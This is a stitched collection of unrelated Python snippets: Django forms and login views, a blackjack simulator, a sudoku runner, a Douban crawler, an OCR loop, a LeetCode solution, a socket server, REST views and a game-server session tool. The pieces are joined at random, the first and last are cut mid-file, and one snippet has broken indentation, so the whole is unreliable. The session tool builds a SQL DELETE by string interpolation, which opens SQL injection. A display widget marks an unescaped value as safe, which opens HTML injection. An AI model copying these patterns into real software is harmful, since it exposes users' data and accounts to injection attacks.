    email2 = forms.EmailField(label='Confirm Email', widget=forms.TextInput(attrs={'type':'email','placeholder':'Confirm Email ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))
    password2 = forms.CharField(label='Confirm Password',widget=forms.PasswordInput(attrs={'type':'password', 'placeholder':'Confirm Password ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))

    class Meta:
        model = User
        fields = [
            'first_name',
            'last_name',
            'username',
            'email',
            'email2',
            'password',
            'password2',
        ]
        widgets={
            'username':forms.TextInput(attrs={'placeholder':'User Name', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'first_name':forms.TextInput(attrs={'placeholder':'First Name ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'last_name':forms.TextInput(attrs={'placeholder':'Last Name ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'email':forms.TextInput(attrs={'placeholder':'Email','type':'email', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            # NOTE(review): TextInput with type=password renders a password
            # box but (unlike forms.PasswordInput) re-displays the submitted
            # value on validation errors — confirm before changing.
            'password':forms.TextInput(attrs={'placeholder':'Password ','type':'password', 'class' :'sizefull s-text7 p-l-18 p-r-18'})
        }

    def clean_email2(self):
        # Confirmation must match and the address must be unused.
        email = self.cleaned_data.get('email')
        email2 = self.cleaned_data.get('email2')
        if email != email2:
            raise forms.ValidationError("Emails must match")
        email_qs = User.objects.filter(email=email)
        if email_qs.exists():
            raise forms.ValidationError("This email has already been registered")
        return email

    def clean_password2(self):
        # Both password fields must agree.
        password = self.cleaned_data.get('password')
        password2 = self.cleaned_data.get('password2')
        if password != password2:
            raise forms.ValidationError("password must match")
        return password
class CustomerRegisterForm(forms.ModelForm):
    """Customer-profile half of the registration flow."""
    # NOTE(review): assigning a form *instance* here does NOT nest it as a
    # field — ModelForm ignores non-Field class attributes, so this line
    # has no effect on rendering or validation. The view presumably
    # handles the two forms separately; confirm before removing.
    user = UserRegisterForm()

    class Meta:
        model = Customer
        fields = [
            'user_image',
            'phone_number',
            'date_of_birth',
            'country',
            'city',
            'address',
        ]
        widgets={
            'phone_number':forms.TextInput(attrs={'placeholder':'Phone Number', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'date_of_birth':forms.TextInput(attrs={'placeholder':'Date of Birth','type':'date', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'country':forms.TextInput(attrs={'placeholder':'Country ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'city':forms.TextInput(attrs={'placeholder':'City', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'address':forms.TextInput(attrs={'placeholder':'Street Address ', 'class' :'sizefull s-text7 p-l-18 p-r-18'})
        }
from string import Template
from django.utils.safestring import mark_safe
from django.conf import settings
class PictureWidget(forms.widgets.Widget):
    """Read-only widget rendering the stored value as an <img> under MEDIA_URL."""

    def render(self, name, value, attrs=None, renderer=None):
        # NOTE(review): value is interpolated unescaped into mark_safe
        # markup; fine for trusted file paths, unsafe for user input.
        markup = Template("""<img src="$media$link"/>""").substitute(
            media=settings.MEDIA_URL, link=value)
        return mark_safe(markup)
class editProfileForm(forms.ModelForm):
    """Edit form for an existing Customer profile (same fields as
    registration, but with a proper DateInput for date_of_birth)."""
    # user_image = forms.ImageField( label=('User image'),required=False, error_messages = {'invalid':("Image files only")}, widget=forms.FileInput)
    # image_tag = forms.ImageField(widget=mark_safe(Template("<img src=""/>")))

    class Meta:
        model=Customer
        # user_image = CloudinaryFileField()
        fields = [
            'user_image',
            'phone_number',
            'date_of_birth',
            'country',
            'city',
            'address',
        ]
        widgets={
            'phone_number':forms.TextInput(attrs={'placeholder':'Phone Number', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'date_of_birth':forms.DateInput(attrs={ 'placeholder':'Date of Birth','type':'date', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'country':forms.TextInput(attrs={'placeholder':'Country ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'city':forms.TextInput(attrs={'placeholder':'City', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
            'address':forms.TextInput(attrs={'placeholder':'Street Address ', 'class' :'sizefull s-text7 p-l-18 p-r-18'})
        }
|
import cards as c
def run_sim(scores, times):
    """Simulate one blackjack hand where the player hits until bust.

    Both arrays are mutated in place (indexed by hand score 0..21):
    scores[s] counts hands that busted while holding score s;
    times[s] counts how many times score s was ever held.
    """
    # deck to hold the cards
    deck = c.Deck()
    # loop invariant: becomes True once the player busts
    busted = False
    # Player
    player = c.Player()
    # deal the player's first two cards
    deck.shuffle()
    player.hit(deck.draw())
    player.hit(deck.draw())
    # main loop, hit until busted
    while not busted:
        # calcHand presumably returns (low, high) totals that differ only
        # when the hand holds an ace — TODO confirm against cards.py.
        (score1, score2) = player.calcHand()
        if score1 != score2:
            times[score1] = times[score1] + 1
            if score2 <= 21:
                times[score2] = times[score2] + 1
        else:
            times[score1] = times[score1] + 1
        player.hit(deck.draw())
        (newScore1, newScore2) = player.calcHand()
        # special case of an ace
        if newScore1 != newScore2:
            # low total busted -> hand is over
            if newScore1 > 21:
                scores[score1] = scores[score1] + 1
                busted = True
            # high total busted: charge the pre-hit high score, but keep
            # playing on the low total (the ace falls back to 1)
            if newScore2 > 21:
                if score2 <= 21:
                    scores[score2] = scores[
                        score2] + 1
        # normal case, no ace
        else:
            if newScore1 > 21:
                scores[score1] = scores[score1] + 1
                busted = True
#---------------------------------------------------
# Data Dictionary
#---------------------------------------------------
# (Python 2 script: statement-form print and xrange below.)
# scores[s]: how many times the player busted after hitting on score s
# times[s]:  how many times the player ever held score s
scores = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
          0, 0, 0, 0, 0, 0, 0, 0]
times = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
         0, 0, 0, 0, 0, 0, 0, 0]
# one million simulated hands; print a dot every 100k as a progress mark
for i in xrange(0, 1000000):
    if ( i % 100000) == 0:
        print "."
    run_sim(scores, times)
# report the empirical P(bust | hitting on score i) for each score seen
# (21 is skipped: hitting on 21 is never a decision worth reporting)
for i in range(0, len(scores)):
    if (scores[i] != 0) and (i != 21):
        print "%d %.3f %d/%d\n" % (
            i, float(scores[i])/float(times[i]),
            scores[i], times[i])
import argparse
import sys
import numpy as np
import pickle
from multiprocessing import Process, Queue, cpu_count
from puzzle_maker import build_new_puzzle, display_grid
from solve_puzzle import search, await_solution
from typing import Dict
def _solve(puzzle: np.ndarray, p: int) -> None:
    """Spawn *p* search workers, wait for the first solution, then tear
    the workers down and exit the process.

    :param puzzle: the sudoku grid; each worker gets its own copy
    :param p: number of worker processes to launch
    """
    q = Queue()
    workers = [Process(target=search, args=(puzzle.copy(), q))
               for _ in range(p)]
    # FIX(style): the loop variable used to shadow the parameter ``p``.
    for worker in workers:
        worker.start()
    await_solution(puzzle, q)
    for worker in workers:
        worker.terminate()
        worker.join()
    sys.exit(0)
def _generate_and_save(clues):
    """Build a new puzzle, persist it to puzzle.pkl, and display it."""
    puzzle = build_new_puzzle(clues)
    with open("puzzle.pkl", "wb") as f:
        pickle.dump(puzzle, f)
    print("puzzle:\n")
    display_grid(puzzle)
    print("saving...")
    return puzzle


def run(args: Dict):
    """Entry point: generate and/or solve a puzzle according to *args*.

    --new: generate + save, then exit without solving.
    --gen: generate + save, then solve.
    default: load the previously saved puzzle and solve it.
    (The duplicated generate/save code of the two branches now lives in
    _generate_and_save.)
    """
    if args["new"]:
        _generate_and_save(args["clues"])
        print("done.")
        sys.exit(0)
    if args["gen"]:
        puzzle = _generate_and_save(args["clues"])
    else:
        try:
            with open("puzzle.pkl", "rb") as f:
                puzzle = pickle.load(f)
            print("puzzle:\n")
            display_grid(puzzle)
        except FileNotFoundError:
            print("No puzzle found. Run again with --gen flag to generate new puzzle.")
            sys.exit(1)
    # Never request more workers than physical cores.
    cpus = min(cpu_count(), args["parallel"])
    print("solving ({} cores)...".format(cpus))
    _solve(puzzle, cpus)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Sudoku")
    parser.add_argument("--new", "-n",
                        const=1,
                        nargs="?",
                        type=int,
                        help="-n to generate new puzzle and save it. Use '--clues' argument to specify number of clues.",
                        default=0)
    parser.add_argument("--gen", "-g",
                        const=1,
                        nargs="?",
                        type=int,
                        help="1 to generate new puzzle (default 0: use saved puzzle, if available).",
                        default=0)
    parser.add_argument("--clues", "-c",
                        type=int,
                        help="Number of clues in new puzzle (default 25).",
                        default=25)
    parser.add_argument("--parallel", "-p",
                        type=int,
                        help="Number of cores to use (default 1).",
                        default=1)
    # vars() is the idiomatic namespace->dict conversion (the original
    # rebuilt the dict item by item from __dict__).
    args = vars(parser.parse_args())
    run(args)
|
# encoding=utf-8
##############################################################################################
# @file:doubanComments.py
# @author:Liyanrui
# @date:2016/11/17
# @version:Ver0.0.0.100
# @note:豆瓣电影选“电影”获取评论的文件
###############################################################################################
import re
import urllib
import json
import math
from utility.timeutility import TimeUtility
from utility.common import Common
from storage.cmtstorage import CMTStorage
from storage.newsstorage import NewsStorage
from utility.timeutility import TimeUtility
from log.spiderlog import Logger
from website.common.comments import SiteComments
from utility.xpathutil import XPathUtility
from bs4 import BeautifulSoup
##############################################################################################
# @class:doubanComments
# @author:Liyanrui
# @date:2016/11/17
# @note:豆瓣电影选“电影”获取评论的类,继承于SiteComments类
##############################################################################################
class doubanComments(SiteComments):
    """Douban movie comment crawler (subclass of SiteComments).

    step1: from the subject page, read the total comment count and queue
           one paged comment-list URL per page of new comments.
    step2: parse each comment page and store text + creation time.
    """
    # Paged comment list; start/limit drive paging, best-rated first.
    COMMENTS_URL = 'https://movie.douban.com/subject/{articleId}/comments?start={start}&limit={pagesize}&sort=new_score&status=P'
    PAGE_SIZE = 20
    # STEP_1 is None on purpose: the shared framework passes step=None on
    # the first dispatch, matched by identity in process() below.
    STEP_1 = None
    STEP_2 = 2
    STEP_3 = 3  # declared but never dispatched in process()
    Flg = True

    def __init__(self):
        """Initialise base-class state only."""
        SiteComments.__init__(self)

    def process(self, params):
        """Dispatch the crawl step supplied by the shared framework.

        Exceptions are logged rather than propagated so one bad page
        does not stop the crawl.
        """
        try:
            if params.step is self.STEP_1:
                self.step1(params)
            elif params.step == self.STEP_2:
                self.step2(params)
        except:
            Logger.printexception()

    #----------------------------------------------------------------------
    def step1(self, params):
        # Extract the subject id from the url.
        articleId = self.r.parse(r'^https://movie\.douban\.com/\w+/(\d+)', params.url)[0]
        # Read the total comment count from the page header.
        xpathobj = XPathUtility(params.content)
        text = xpathobj.getstring(xpath='//*[@id="comments-section"]//h2/*[@class="pl"]/a')
        numtext = self.r.parse('\d+', text)
        if not numtext:
            return
        curcmtnum = float(numtext[0])
        NewsStorage.setcmtnum(params.originalurl, curcmtnum)
        dbcmtnum = CMTStorage.getcount(params.originalurl, True)
        # Nothing new since the last crawl.
        if dbcmtnum >= curcmtnum:
            return
        # Queue one comment-page url per page of new comments (capped).
        pages = int(math.ceil(float(curcmtnum - dbcmtnum) / self.PAGE_SIZE))
        if pages >= self.maxpages:
            pages = self.maxpages
        for page in range(1, pages + 1, 1):
            url = doubanComments.COMMENTS_URL.format(articleId=articleId, start=(page-1) * self.PAGE_SIZE, pagesize=self.PAGE_SIZE)
            self.storeurl(url, params.originalurl, doubanComments.STEP_2)

    #----------------------------------------------------------------------
    def step2(self, params):
        # Parse each comment's text and creation time and store them.
        soup = BeautifulSoup(params.content, 'html5lib')
        comments = soup.select('#comments > .comment-item')
        for comment in comments:
            try:
                curtime = comment.select_one('.comment-time').get('title')
                content = comment.select_one('.comment > p').get_text()
                CMTStorage.storecmt(params.originalurl, content, curtime, '')
            except:
                Logger.printexception()
# Guess the number game: up to six attempts at a number in 1..100.
import random

secretNumber = random.randint(1, 100)
print("I am thinking of a number between 1 and 100.")
for guessTally in range(1, 7):
    print("Make a guess:")
    guess = int(input())
    if guess < secretNumber:
        print("Too Low!")
    elif guess > secretNumber:
        print("Too High!")
    else:
        # Correct: stop early; guessTally keeps the attempt count.
        break
if guess == secretNumber:
    print("Correct! You guessed correctly in " + str(guessTally) + " guesses.")
else:
    print("Wrong! The number was " + str(secretNumber))
|
from django.contrib.auth import authenticate, login as django_login
from django.shortcuts import render, redirect
# Create your views here.
from django.contrib.auth.hashers import make_password, check_password
from django.http import JsonResponse
from django.urls import reverse
from .models import UserToken, Info
from django.views.generic import View
from captcha.models import CaptchaStore
from captcha.helpers import captcha_image_url
from django.http import HttpResponse
import json
import time
def login(request):
    """Log a user in: verify the password hash and the captcha, then
    mint a session token for the account."""
    if request.method == 'GET':
        return render(request, 'login/login.html')
    usr = request.POST.get('username')
    pas = request.POST.get('password')
    # (The original also called make_password(pas) here and discarded the
    # result — removed as a no-op.)
    obj = Info.objects.filter(username=usr).first()
    if not obj:
        return render(request, 'error.html', {
            'msg': '用户不存在'
        })
    # BUG FIX: the original tested ``if not check_pas:`` — the stored
    # *hash*, which is always truthy — so wrong passwords were accepted.
    # The comparison result of check_password() is what must be tested.
    check_pas = Info.objects.filter(username=usr).values('password')[0]['password']
    if not check_password(pas, check_pas):
        return render(request, 'error.html', {
            'msg': '账号密码不匹配'
        })
    # Validate the captcha BEFORE minting a token (the original created
    # the token even when the captcha was wrong).
    capt = request.POST.get("yzm")   # captcha text typed by the user
    key = request.POST.get("hash")   # captcha challenge key
    if not jarge_captcha(capt, key):
        return render(request, 'login/login.html', {
            'code': 0,
            'msg': '验证码不正确'
        })
    token = str(time.time()) + usr
    UserToken.objects.update_or_create(username=obj, defaults={'token': token})
    return redirect(reverse('blog:index'))
def register(request):
    """Register a new account after captcha validation."""
    if request.method == 'GET':
        return render(request, 'login/register.html')
    user = request.POST.get('username')
    print(user)  # NOTE(review): debug print left in; remove for production
    pwd = request.POST.get('password')
    # Hash the password before storing it.
    passpwd = make_password(pwd)
    tel = request.POST.get('telphone')
    capt = request.POST.get("yzm")  # captcha text typed by the user
    key = request.POST.get("hash")  # captcha challenge key
    if not jarge_captcha(capt, key):
        return render(request, 'login/register.html', {
            'code': 0,
            'msg': '验证码不正确'
        })
    obj = Info.objects.filter(username=user).first()
    if not obj:
        # Username is free: create the account.
        user = Info.objects.create(username=user, password=passpwd, telphone=tel)
        if not user:
            return render(request, 'error.html', {'msg': '创建用户失败'})
        return render(request, 'login/login.html', {'code': 1, 'msg': '注册成功'})
    else:
        return render(request, 'login/login.html', {'code': 2, 'msg': '用户已存在,注册失败'})
# Create a new captcha challenge.
def captcha():
    """Generate a captcha (answer key + image url) and return it as JSON."""
    hashkey = CaptchaStore.generate_key()
    payload = {
        'hashkey': hashkey,
        'image_url': captcha_image_url(hashkey),
    }
    return JsonResponse(payload)
# Refresh the captcha.
def refresh_captcha(request):
    """Return a fresh captcha challenge as JSON.

    BUG FIX: the original did ``json.dumps(captcha())`` — but captcha()
    returns a JsonResponse, which json.dumps cannot serialise, raising
    TypeError on every call. captcha() already produces a fully-formed
    JSON response, so it is returned directly.
    """
    return captcha()
# Validate a submitted captcha answer.
def jarge_captcha(captchaStr, captchaHashkey):
    """Return True when *captchaStr* matches the stored answer for
    *captchaHashkey*, False otherwise.

    Fixes over the original: the mismatch path used to fall through and
    return None implicitly (falsy but surprising), and a bare ``except``
    swallowed every error — now only the expected missing-key case is
    caught.
    """
    if not (captchaStr and captchaHashkey):
        return False
    try:
        get_captcha = CaptchaStore.objects.get(hashkey=captchaHashkey)
    except CaptchaStore.DoesNotExist:
        return False
    # Comparison is case-insensitive on the user's side.
    return get_captcha.response == captchaStr.lower()
class IndexView(View):
    """Return a fresh captcha challenge (answer key + image url) as JSON."""

    def get(self, request):
        hashkey = CaptchaStore.generate_key()
        payload = {
            'hashkey': hashkey,
            'image_url': captcha_image_url(hashkey),
        }
        return JsonResponse(payload)
|
try:
from PIL import Image
except ImportError:
import Image
import pytesseract
# Sanity-check the OCR setup against a known pre-solved image first.
print (pytesseract.image_to_string(Image.open("solved.jpg")))
output = ''
# OCR tiles 1.jpg .. 576.jpg in order and concatenate the recognised
# text. NOTE(review): 576 tiles suggests a 24x24 grid — confirm.
for i in range(1, 577):
    name = "%s.jpg" % i
    c = pytesseract.image_to_string(Image.open(name))
    print ("%s - %s" % (name, c))
    output += c
print (output)
|
class Solution:
    def findLengthOfShortestSubarray(self, arr: List[int]) -> int:
        """LeetCode 1574: length of the shortest contiguous subarray whose
        removal leaves the remainder non-decreasing.

        Strategy: find the longest sorted prefix arr[0..left_end] and the
        longest sorted suffix arr[right_end..], then two-pointer merge to
        find the largest sorted prefix+suffix combination; the answer is
        everything that cannot be kept.
        """
        if len(arr) == 0:
            return 0
        left_end, right_end = 0, len(arr)-1
        # Grow the longest non-decreasing prefix.
        while left_end < len(arr)-1:
            if left_end+1 < len(arr) and arr[left_end+1] < arr[left_end]:
                break
            left_end += 1
        # Grow the longest non-decreasing suffix.
        while right_end > 0:
            if right_end-1 > -1 and arr[right_end-1] > arr[right_end]:
                break
            right_end -= 1
        # merge = best count of elements kept by joining a prefix piece
        # with a suffix piece (prefix tail must not exceed suffix head).
        merge = float('-inf')
        # right starts past left_end+1 so the two pieces never overlap.
        left, right = 0, max(right_end, left_end+1)
        while left <= left_end and right < len(arr):
            if arr[left] > arr[right]:
                # Suffix head too small: advance it.
                right += 1
            else:
                # Keep arr[0..left] plus arr[right..]; record and extend.
                merge = max(merge, left + 1 + len(arr) - right)
                left += 1
        # Candidates kept: whole prefix, whole suffix, or merged pieces.
        return len(arr) - max(left_end+1, len(arr)-right_end, merge)
|
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import pandas as pd
# Compare LiDAR point groups for one sign id between the 2015 and 2018
# datasets as two separate 3-D scatter plots.
df_visual_data = pd.read_csv('visualize_I258_2015_inaccuracy.csv')
df_visual_data_2018 = pd.read_csv('visualize_radius_group_indices_frame_2018.csv')
sign_to_plot = int(input("Please enter the sign you want to plot"))
# Group by sign id, then keep only the requested sign's rows.
df_visual_data = df_visual_data.groupby('sign_id')
df_visual_data_2018 = df_visual_data_2018.groupby('sign_id')
print(len(df_visual_data),'2015')   # number of distinct signs
print(len(df_visual_data_2018),'2018')
df_visual_data = df_visual_data.get_group(sign_to_plot)
df_visual_data_2018 = df_visual_data_2018.get_group(sign_to_plot)
print(len(df_visual_data),'2015')   # number of points for this sign
print(len(df_visual_data_2018),'2018')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
fig_1 = plt.figure()
ax_1 = fig_1.add_subplot(111, projection='3d')
# Collect the 2018 LiDAR coordinates.
x_1=[]
y_1=[]
z_1=[]
for row in df_visual_data_2018.iterrows():
    index=row[0]
    value=row[1]
    x_1.append(value['lidar_lat'])
    y_1.append(value['lidar_long'])
    z_1.append(value['lidar_alt'])
#print(len(x))
# Collect the 2015 LiDAR coordinates.
x=[]
y=[]
z=[]
for row in df_visual_data.iterrows():
    index=row[0]
    value=row[1]
    x.append(value['lidar_lat'])
    y.append(value['lidar_long'])
    z.append(value['lidar_alt'])
# x_sign=df_visual_data['lat_sign']
# y_sign=df_visual_data['long_sign']
# z_sign=df_visual_data['alt_sign']
# x_car=df_visual_data['car_lat']
# y_car=df_visual_data['car_long']
# z_car=df_visual_data['car_alt']
ax.scatter(x, y, z,s=3, c='r', marker='o')
# ax.scatter(x_sign, y_sign, z_sign, c='g', marker='^')
# ax.scatter(x_car,y_car,z_car,c='y',marker='*')
ax_1.scatter(x_1, y_1, z_1,s=3, c='g', marker='o')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
ax.set_title('2015')
ax_1.set_xlabel('X Label')
ax_1.set_ylabel('Y Label')
ax_1.set_zlabel('Z Label')
ax_1.set_title('2018')
plt.show()
|
# 3. A client sends to the server a string. The server returns the reversed string to the client (characters from the end to begging)
import socket, struct
def read_string(source):
    """Read from *source* one byte at a time until a newline and return
    the decoded line (newline excluded).

    Fixes over the original: sockets carry *bytes* in Python 3, so the
    old ``str + bytes`` concatenation raised TypeError; and a closed
    connection (recv() returning b'') used to spin forever — it now
    terminates the read.
    """
    chunks = []
    while True:
        c = source.recv(1)
        if not c or c == b'\n':
            break
        chunks.append(c)
    return b''.join(chunks).decode()
def solve_client(client):
    """Read one newline-terminated string from *client* and send it back
    reversed (newline-terminated)."""
    string = read_string(client)
    # encode(): sendall requires bytes in Python 3 (the original passed str).
    client.sendall((string[::-1] + '\n').encode())
if __name__ == "__main__":
    print(socket.gethostname())
    try:
        # TCP server on all interfaces, port 8090, listen backlog of 5.
        rs=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        rs.bind( ('0.0.0.0',8090) )
        rs.listen(5)
    except socket.error as msg:
        print(msg.strerror)
        exit(-1)
    # Serve forever, one client at a time.
    # NOTE(review): client sockets are never closed after being served,
    # and the accept loop has no shutdown path.
    while True:
        print('Waiting clients..')
        client_socket, addrc = rs.accept()
        print('Client ' + str(addrc) + ' has connected.')
        solve_client(client_socket)
|
'''
- Methods (functions):
def function(*args, **kwargs):
-actions-
-checkers-
-loggers-
-returns-
-exceptions-
''' |
from django import forms
from django.contrib.contenttypes.models import ContentType
from django.db.models import Q, Count
from django_serializer.base_views import (ListView, DetailsView,
CreateView, DeleteView, BaseView)
from django_serializer.exceptions import ServerError
from django_serializer.mixins import ObjectMixin, SerializerMixin
from django_serializer.permissions import PermissionsModelMixin, PermissionsMixin
from vkrb.core.mixins import EventMixin, LimitOffsetFullPaginator
from vkrb.core.utils import get_absolute_bundle_urls, render_to_pdf
from vkrb.favorites.forms import FavoriteForm
from vkrb.favorites.models import FavoriteItem
from vkrb.recourse.forms import RecourseForm, LikeRecourseForm
from vkrb.recourse.models import Recourse, Specialty, RecourseLike
from vkrb.recourse.serializers import (RecourseSerializer,
SpecialtySerializer,
RecourseLikeSerializer)
class RecourseListView(EventMixin, ListView):
    """Paginated list of top-level recourses, filterable by owner and specialty."""

    class RecourseForm(forms.Form):
        # NOTE: this nested args form intentionally shadows the imported
        # RecourseForm; ``args_form = RecourseForm`` below binds the
        # nested class because it is assigned AFTER this definition —
        # keep the class-body order intact.
        my = forms.BooleanField(required=False)
        specialty = forms.ModelChoiceField(Specialty.objects.all(), required=False)

    def get_queryset(self):
        # Only top-level recourses (no parent), newest first, optionally
        # narrowed to the requesting user and/or one specialty.
        queryset = super().get_queryset()
        q = Q(parent__isnull=True)
        my = self.request_args.get('my')
        specialty = self.request_args.get('specialty')
        if my:
            q &= Q(user=self.request.user)
        if specialty:
            q &= Q(specialty=specialty)
        return queryset.filter(q).order_by('-created')

    def get_serializer_kwargs(self, obj, **kwargs):
        # The serializer needs the requesting user for per-user fields.
        serializer_kwargs = super().get_serializer_kwargs(obj, **kwargs)
        serializer_kwargs['request_user'] = self.request.user
        return serializer_kwargs

    section = 'recourse'
    args_form = RecourseForm  # the nested form above, not the import
    authorized_permission = (PermissionsModelMixin.Permission.R,)
    paginator = LimitOffsetFullPaginator
    model = Recourse
    serializer = RecourseSerializer
class RecourseGetView(DetailsView):
    """Detail endpoint for a single Recourse."""
    authorized_permission = (PermissionsModelMixin.Permission.R,)
    model = Recourse
    serializer = RecourseSerializer

    def get_serializer_kwargs(self, obj, **kwargs):
        # The serializer needs the requesting user for per-user fields.
        kw = super().get_serializer_kwargs(obj, **kwargs)
        kw['request_user'] = self.request.user
        return kw
class RecourseCreateView(CreateView):
    """Create a Recourse on behalf of the requesting user."""
    authorized_permission = (PermissionsModelMixin.Permission.R,
                             PermissionsModelMixin.Permission.W)
    serializer = RecourseSerializer
    form_class = RecourseForm

    def get_serializer_kwargs(self, obj, **kwargs):
        kw = super().get_serializer_kwargs(obj, **kwargs)
        kw['request_user'] = self.request.user
        return kw

    def get_form_kwargs(self):
        # The form records the authenticated user as the author.
        form_kwargs = super().get_form_kwargs()
        form_kwargs['user'] = self.request.user
        return form_kwargs
class SpecialtyListView(ListView):
    """Paginated list of specialties in their configured display order."""
    model = Specialty
    serializer = SpecialtySerializer
    paginator = LimitOffsetFullPaginator

    def get_queryset(self):
        return super().get_queryset().order_by('order')
class LikeCreateView(CreateView):
    """Attach a like from the requesting user to a recourse."""
    authorized_permission = (PermissionsModelMixin.Permission.R,
                             PermissionsModelMixin.Permission.W)
    serializer = RecourseLikeSerializer
    form_class = LikeRecourseForm

    def get_form_kwargs(self):
        # The form attributes the like to the authenticated user.
        form_kwargs = super().get_form_kwargs()
        form_kwargs['user'] = self.request.user
        return form_kwargs
class LikeDeleteView(DeleteView):
    """Remove the requesting user's like from the given recourse."""

    class LikeForm(forms.Form):
        # Validates that the posted id refers to an existing Recourse.
        recourse = forms.ModelChoiceField(Recourse.objects.all())

    model = RecourseLike

    def get_args_form(self):
        return self.LikeForm

    def get_object(self):
        # EAFP: fetch the user's like; 404 when there is none.
        try:
            return self.model.objects.get(
                user=self.request.user,
                recourse=self.request_args['recourse'])
        except self.model.DoesNotExist:
            raise ServerError(ServerError.NOT_FOUND)
class CreatePDFView(ObjectMixin, PermissionsMixin, BaseView):
    """Render a recourse (plus its five most-liked replies) as a PDF."""
    model = Recourse
    authorized_permission = (PermissionsModelMixin.Permission.R,)

    def response_wrapper(self, response):
        # The PDF response is returned as-is, bypassing JSON wrapping.
        return response

    def get(self, request, *args, **kwargs):
        self.check_r_permission(self.request.user)
        recourse = self.get_object()
        top_children = (Recourse.objects
                        .filter(parent=recourse)
                        .annotate(num_likes=Count('recourselike'))
                        .order_by('-num_likes')[:5])
        context = {
            'recourse': recourse,
            'children': top_children,
            'css_urls': get_absolute_bundle_urls('pdf', 'css'),
        }
        return render_to_pdf(template_path='recourse.html', ctx=context)
class FavoriteRecourseCreateView(CreateView):
    """Add a recourse to the requesting user's favorites.

    The response echoes the favorited Recourse itself rather than the
    FavoriteItem wrapper.
    """
    authorized_permission = (PermissionsModelMixin.Permission.R,
                             PermissionsModelMixin.Permission.W)
    serializer = RecourseSerializer
    form_class = FavoriteForm

    def get_form_kwargs(self):
        form_kwargs = super().get_form_kwargs()
        form_kwargs['user'] = self.request.user
        form_kwargs['content_type'] = 'recourse'
        return form_kwargs

    def get_serializer_kwargs(self, obj, **kwargs):
        kw = super().get_serializer_kwargs(obj, **kwargs)
        kw['request_user'] = self.request.user
        return kw

    def post(self, request, *args, **kwargs):
        favorite = super().post(request, *args, **kwargs)
        # Unwrap the generic-FK target so the client gets the Recourse.
        return favorite.content_object
class FavoriteRecourseDeleteView(SerializerMixin, DeleteView):
    """Remove a recourse from favorites and echo the recourse back."""
    authorized_permission = (PermissionsModelMixin.Permission.R,
                             PermissionsModelMixin.Permission.D)
    model = FavoriteItem
    serializer = RecourseSerializer

    class FavoriteForm(forms.Form):
        object_id = forms.IntegerField()

    def get_args_form(self):
        return self.FavoriteForm

    def get_object(self):
        content_type = ContentType.objects.get(model='recourse')
        try:
            return self.model.objects.get(
                user=self.request.user,
                content_type=content_type,
                object_id=self.request_args['object_id'])
        except self.model.DoesNotExist:
            raise ServerError(ServerError.NOT_FOUND)

    def get_serializer_kwargs(self, obj, **kwargs):
        kw = super().get_serializer_kwargs(obj, **kwargs)
        kw['request_user'] = self.request.user
        return kw

    def post(self, request, *args, **kwargs):
        # Delete the FavoriteItem, then return the underlying Recourse.
        super().post(request, *args, **kwargs)
        try:
            return Recourse.objects.get(id=self.request_args['object_id'])
        except Recourse.DoesNotExist:
            raise ServerError(ServerError.NOT_FOUND)
|
# Read nine integers; print the largest value and the (1-based) position
# of its last occurrence.
values = []
# Renamed from ``max``, which shadowed the builtin of the same name.
largest = 0
# FIX: initialise count so all-negative input no longer raises NameError
# (the >= 0 start value still assumes non-negative inputs overall).
count = 0
for i in range(9):
    values.append(int(input()))
    if values[i] >= largest:
        largest = values[i]
        count = i + 1
print(largest)
print(count)
# print((values.index(largest)) + 1)  # alternative using list.index
# MPI "Hello, World": every rank reports its rank, world size and host.
from mpi4py import MPI
rank = MPI.COMM_WORLD.Get_rank()
size = MPI.COMM_WORLD.Get_size()
name = MPI.Get_processor_name()
msg = ("Hello, World! "
       "I am process %d of %d on %s\n" %
       (rank, size, name))
import sys
# write() instead of print() keeps each rank's message on a single line.
sys.stdout.write(msg)
|
# Metadata consumed by the ffxi-tools module loader.
MODULE_NAME = 'close-session'
MODULE_DESC = "Remove an account's session"
MODULE_VER = '1.0'
def START(db, *args):
    """Remove Darkstar account sessions"""
    # Python 2 module: statement-form prints below.
    import argparse
    AP = argparse.ArgumentParser('ffxi-tools ' + MODULE_NAME,
                                 description='Removes a session')
    AP.add_argument('login', metavar='login_name',
                    help='The login for the account')
    args = AP.parse_args(args=args)
    # All active sessions joined to their account login and character.
    sessions = db.get('''
        select acc.login, c.charname
        from accounts_sessions sess
        left join accounts acc on sess.accid = acc.id
        left join chars c on sess.charid = c.charid
    '''.strip(), ('login', 'character'))
    # NOTE(review): substring match against str(sessions) can match the
    # wrong account when one login is a prefix of another.
    if sessions and args.login in str(sessions):
        print 'Removing session for', args.login, '...',
        # SECURITY NOTE(review): the login is %-interpolated straight
        # into the SQL — injection risk; use bound parameters if db.run
        # supports them.
        db.run('''
            delete from accounts_sessions
            where accid = (select id from accounts where login = '%s')
        '''.strip() % (args.login,))
        print 'Removed'
    else:
        print 'No session found for account', args.login
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
# loading image
img0 = cv2.imread('gaussian 1.png')
# converting to gray scale
gray = cv2.cvtColor(img0, cv2.COLOR_BGR2GRAY)
# remove noise
#img = cv2.GaussianBlur(gray,(3,3),0)
# NOTE(review): the Sobel filters below run on the original colour image
# (img0), so ``gray`` is computed but never used — presumably the intent
# was cv2.Sobel(gray, ...); confirm before changing, as it alters output.
